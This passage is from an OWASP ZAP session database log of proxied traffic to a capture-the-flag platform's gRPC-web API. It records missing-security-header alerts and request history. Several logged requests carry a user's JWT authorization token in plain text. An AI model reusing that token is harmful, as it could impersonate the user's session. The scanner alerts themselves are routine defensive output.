02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=11 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',12,'','129') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(52,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 53 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=51 -INSERT INTO BLOCKS VALUES(51,1,0) -INSERT INTO BLOCKS VALUES(52,2147483595,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=51 -INSERT INTO LOBS VALUES(51,1,0,52) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(52,1,'2024-03-02 03:35:17.057000',1,52,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=52 -INSERT INTO LOB_IDS VALUES(52,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(33,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',21,21,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(69,33,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(70,33,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(53,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 54 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=52 -INSERT INTO BLOCKS VALUES(52,1,0) -INSERT INTO BLOCKS VALUES(53,2147483594,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=52 -INSERT INTO LOBS VALUES(52,1,0,53) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(53,1,'2024-03-02 03:35:17.059000',1,53,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=53 -INSERT INTO LOB_IDS VALUES(53,573,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(54,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 55 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=53 -INSERT INTO BLOCKS VALUES(53,1,0) -INSERT INTO BLOCKS VALUES(54,2147483593,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=53 -INSERT INTO LOBS VALUES(53,1,0,54) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(54,1,'2024-03-02 03:35:17.952000',1,54,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=54 -INSERT INTO LOB_IDS VALUES(54,64,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(22,1709346750724,1,200,1709346918678,165,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Vary, Date, Content-Type, Access-Control-Allow-Origin, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:18 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(55,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 56 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=54 -INSERT INTO BLOCKS VALUES(54,1,0) -INSERT INTO BLOCKS VALUES(55,2147483592,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=54 -INSERT INTO LOBS VALUES(54,1,0,55) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(55,1,'2024-03-02 03:35:18.846000',1,55,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=55 -INSERT INTO LOB_IDS VALUES(55,323,1,40) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=16 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',17,'','https://play.cscg.live') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(34,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',22,22,'','',319,15,3,'','10035-1') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=12 AND FLAGS='' AND VALS='Date%2C Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',13,'','Date%2C Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=16 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',17,'','h3=":443"; ma=2592000') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(71,34,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=12 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',13,'','application/grpc-web+proto') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(72,34,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=16 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',17,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=12 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',13,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=16 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',17,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:35:18 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=12 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',13,'','129') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(56,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 57 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=55 -INSERT INTO BLOCKS VALUES(55,1,0) -INSERT INTO BLOCKS VALUES(56,2147483591,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=55 -INSERT INTO LOBS VALUES(55,1,0,56) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(56,1,'2024-03-02 03:35:19.051000',1,56,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=56 -INSERT INTO LOB_IDS VALUES(56,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(35,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',22,22,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(73,35,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(74,35,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(57,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 58 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=56 -INSERT INTO BLOCKS VALUES(56,1,0) -INSERT INTO BLOCKS VALUES(57,2147483590,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=56 -INSERT INTO LOBS VALUES(56,1,0,57) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(57,1,'2024-03-02 03:35:19.055000',1,57,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=57 -INSERT INTO LOB_IDS VALUES(57,573,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(23,1709346750724,1,200,1709346920686,174,'OPTIONS','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','OPTIONS https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aAccess-Control-Request-Method: POST\u000d\u000aAccess-Control-Request-Headers: authorization,content-type,x-grpc-web,x-user-agent\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Headers: content-type,accept,x-user-agent,x-grpc-web,grpc-status,grpc-message,authorization\u000d\u000aAccess-Control-Allow-Methods: GET,HEAD,POST,PUT,DELETE\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Length: 0\u000d\u000aDate: Sat, 02 Mar 2024 02:35:20 GMT\u000d\u000aServer: Caddy\u000d\u000a\u000d\u000a','',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(58,324,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 59 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=57 -INSERT INTO BLOCKS VALUES(57,1,0) -INSERT INTO BLOCKS VALUES(58,2147483589,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=57 -INSERT INTO LOBS VALUES(57,1,0,58) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(58,1,'2024-03-02 03:35:20.861000',1,58,NULL,324,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=58 -INSERT INTO LOB_IDS VALUES(58,324,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(24,1709346750724,1,200,1709346920865,94,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Vary, Date, Content-Type, Access-Control-Allow-Origin, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:20 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(59,322,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 60 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=58 -INSERT INTO BLOCKS VALUES(58,1,0) -INSERT INTO BLOCKS VALUES(59,2147483588,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=58 -INSERT INTO LOBS VALUES(58,1,0,59) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(59,1,'2024-03-02 03:35:20.962000',1,59,NULL,322,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=59 -INSERT INTO LOB_IDS VALUES(59,322,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(36,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',24,24,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(75,36,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(76,36,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(37,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',23,23,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(77,37,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(78,37,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=18 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Headers' AND USED=4 AND FLAGS='' AND VALS='content-type%2Caccept%2Cx-user-agent%2Cx-grpc-web%2Cgrpc-status%2Cgrpc-message%2Cauthorization' -INSERT INTO PARAM VALUES(18,'api.cscg.live:444','header','Access-Control-Allow-Headers',5,'','content-type%2Caccept%2Cx-user-agent%2Cx-grpc-web%2Cgrpc-status%2Cgrpc-message%2Cauthorization') -COMMIT -DELETE FROM PARAM WHERE PARAMID=19 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Methods' AND USED=4 AND FLAGS='' AND VALS='GET%2CHEAD%2CPOST%2CPUT%2CDELETE' -INSERT INTO PARAM VALUES(19,'api.cscg.live:444','header','Access-Control-Allow-Methods',5,'','GET%2CHEAD%2CPOST%2CPUT%2CDELETE') -COMMIT -DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=17 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',18,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=17 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',18,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=20 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Length' AND USED=4 AND FLAGS='' AND VALS='0' -INSERT INTO PARAM VALUES(20,'api.cscg.live:444','header','Content-Length',5,'','0') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=17 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:35:18 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',18,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT,Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:16 GMT,Sat%2C 02 Mar 2024 02:35:14 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:35:18 GMT,Sat%2C 02 Mar 2024 02:35:20 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=17 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',18,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=18 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',19,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=13 AND FLAGS='' AND VALS='Date%2C Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',14,'','Date%2C Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Content-Type%2C Date%2C grpc-status%2C grpc-message,Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=18 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM 